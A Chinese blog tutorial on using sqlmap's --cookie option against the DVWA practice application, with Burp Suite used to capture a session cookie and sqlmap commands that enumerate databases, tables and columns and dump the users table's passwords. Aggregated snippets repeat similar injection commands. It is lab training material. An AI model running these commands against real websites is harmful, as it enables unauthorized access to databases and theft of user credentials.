SQLMAP进阶使用 --cookie

最新推荐文章于 2024-05-14 20:32:00 发布
最新推荐文章于 2024-05-14 20:32:00 发布
阅读量5.5k 收藏 22
点赞数 3
分类专栏: SQL注入 文章标签: web安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123015001
版权

实验原理

Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。

1.访问DVWA网站

1)访问dvwa,并登录。admin password

2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA网站的安全级别设为“Low”,并点击Submt

3)左侧菜单点击“SQL Injection”模块,进入SQL注入训练模块

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

https://i-blog.csdnimg.cn/blog_migrate/6537c43e77c2c49277bee1eab6d0b1af.png

2)设置Firefox代理

​ 

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能
https://i-blog.csdnimg.cn/blog_migrate/10bfdc0ae0c2cf91c783ede54dd6aa1c.png

 4)利用Burpsuite工具拦截HTTP请求包

进入DVWA网站SQL注入训练模块,输入1,点击Submit,此时Burpsuite会拦截到HTTP请求包

 将其中的cookie值拷贝下来,作为下一步为SQLMAP的 --cookie参数赋值

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

https://i-blog.csdnimg.cn/blog_migrate/4a3c18e77fb82bf1d103b451fa3c7c5b.png

 4.寻找注入点

 python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" 

 检测结果

 5.获取数据库的库名

1)获取所有数据库的库名

 python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --dbs

 

 2)获取当前数据库的库名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --current-db

 

6.获取dvwa数据库中所有的表名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa --tables 

 

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users --columns 

 

8.获取users表中user和password字段的全部值

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users -C user,password --dump 

 

Z_l123
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
sqlmap指定cookie_sqlmap使用
weixin_42128393的博客
01-30 1439
kali中sqlmap使用sqlmap简介:SQLmap是一个自动化的SQL注入攻击,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。目前支持Mysql、Oracle、MS-SQL、PostgreSQL与Access等数据库。SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包含数据库指纹、枚举、数据库提取,访问...
sqlmap命令详解
Pitbull2014的博客
12-20 1130
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
网络安全最全SQLmap使用教程图文教程(超详细)(1),撸了郭霖大神写的Framework源码笔记
最新发布
2401_84264583的博客
05-14 987
1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
测试工具-sqlmap
weixin_42902126的博客
06-27 4288
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
Sqlmap2021 -- Cookie注入
weixin_41489908的博客
07-07 4054
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
渗透工具-sqlmap-基本知识及使用教程
m0_59856804的博客
03-02 1577
sqlmap的详细使用教程
sqlmap指定cookie_sqlmap处理cookie数据
weixin_34061793的博客
12-24 1879
Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookieweb应用中至关重要,用户的唯一标识session id也是存在cookie中的。那么,在sqlmap使用的时候,也会经常需要考虑到cookiesqlmap也提供了和cookie相关的命令,本文将会介绍。1. cookie保存了用户登录状态很多网站的功能都是需要登陆后才能访问,而http本身是无状态的,因此服务器...
sqlmapproject-sqlmap-1.4.8-11-ga42ec7d.zip
08-20
SQLMap工具详解——以sqlmapproject-sqlmap-1.4.8-11-ga42ec7d.zip为例》 SQLMap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它能够帮助安全研究人员或者渗透测试者识别并利用网站应用...
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz)
04-20
在描述中提到的"sqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz"是SQLMap的一个特定版本,版本号为1.6.4,其中的"gfb3f428"是Git提交的哈希值,这通常意味着该版本是在Git版本控制系统下开发并发布的。`.tar.gz`是一...
sqlmap-1.3.7-19.zip
07-12
在压缩包`sqlmapproject-sqlmap-c3a95e8`中,`sqlmap`目录很可能包含了源代码、可执行文件、文档和其他相关资源。对于安全专业人士来说,了解和掌握如何使用这个工具是至关重要的,因为它不仅可以用于测试自己的系统...
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
04-20
在压缩包`sqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip`中,包含了SQLMap的源码和其他相关资源。解压后,我们可以看到项目的结构,包括源代码、文档、示例以及安装和使用指南。通过研究这些内容,我们可以深入理解...
Sqlmap常用命令总结
jemus17的博客
02-26 3296
sql注入sqlmap的常用命令总结
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
注入之SQLMAP(工具注入)
2301_79194110的博客
09-18 488
u get注入-r post注入-r --level cookies注入执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。-v 信息级别显示ERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload。
【网络安全 | 渗透工具】SQLmap精讲(全网最详细图文教程)
等风来
01-06 1万+
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。留言板项目SQLmap渗透实例 | CSDN@秋说本文以目标账号与其它进行讲解。
sqlmap指定cookie_SQLmap
weixin_26812607的博客
01-30 545
**参数解释**星号在注入的过程中,有时候是伪静态的页面,可以使用星号表示可能存在注入的部分--data使用post方式提交的时候,就需要用到data参数了-p当我们已经事先知道哪一个参数存在注入就可以直接使用-p来指定,从而减少运行时间--level不同的level等级,SQLMAP所采用的策略也不近相同,当–level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数;当–...
SQLmap 扫描工具的使用
m0_61990875的博客
10-21 2875
sqlmap使用方法
Sqlmap 设置请求参数
白菜执笔人的博客
02-26 3300
Web安全攻防 学习笔记 一、Sqlmap 设置 cookie 1.1、sqlmap 中用来设置 cookie 的参数 --cookie --cookie-del --load-cookies --drop-set-cookie # 如果 http 响应头中有 set-cookie 但是又不想使用其进行测试时, 可设置该参数 使用场景 web 应用程序具有基于 coo...
sqlmap --cookie
07-27
sqlmap是一款用于自动化SQL注入的工具,可以帮助安全测试人员发现和利用Web应用程序中的SQL注入漏洞。在使用sqlmap时,可以使用--cookie参数来设置cookie值,以便进行基于cookie验证的注入测试。例如,可以使用以下命令来设置cookie值: sqlmap.py -u "http://example.com/vulnerabilities/sqli/?id=1" --cookie "PHPSESSID=ngogkm5l9njs6j7vrrtunm5me5; security=low" 其中,-u参数指定了目标URL,--cookie参数用于设置cookie值。通过设置正确的cookie值,sqlmap可以模拟已登录的用户,并进行注入测试。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [测试工具-sqlmap篇](https://blog.csdn.net/weixin_42902126/article/details/125172809)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [SQLMAP进阶使用 --cookie](https://blog.csdn.net/Z_l123/article/details/123015001)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值